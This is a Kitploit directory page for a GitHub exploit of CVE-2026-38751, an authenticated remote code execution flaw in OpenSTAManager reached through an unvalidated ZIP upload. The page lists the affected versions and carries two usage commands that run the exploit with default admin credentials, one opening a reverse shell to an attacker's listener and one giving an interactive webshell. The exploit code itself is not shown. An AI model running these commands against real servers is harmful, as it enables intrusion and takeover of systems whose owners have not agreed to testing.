Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-38751 — Authenticated remote code execution exploit for OpenSTAManager via unvalidated ZIP upload, providing reverse shell and interactive webshell capabilities for authorized penetration testing. | Kitploit
Tools/GitHubGitHub/why-shell/cve-2026-38751
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubwhy-shell/cve-2026-38751

CVE-2026-38751

Authenticated remote code execution exploit for OpenSTAManager via unvalidated ZIP upload, providing reverse shell and interactive webshell capabilities for authorized penetration testing.

View Repository
33 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-38751 — OpenSTAManager Module Upload RCE

Authenticated RCE via unvalidated ZIP upload in the module update endpoint.

Affected: OpenSTAManager <= 2.10.x

Requirements

pip install requests

Usage

# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444

# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive

References

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

Disclaimer

For authorized penetration testing and educational purposes only.

Download Tool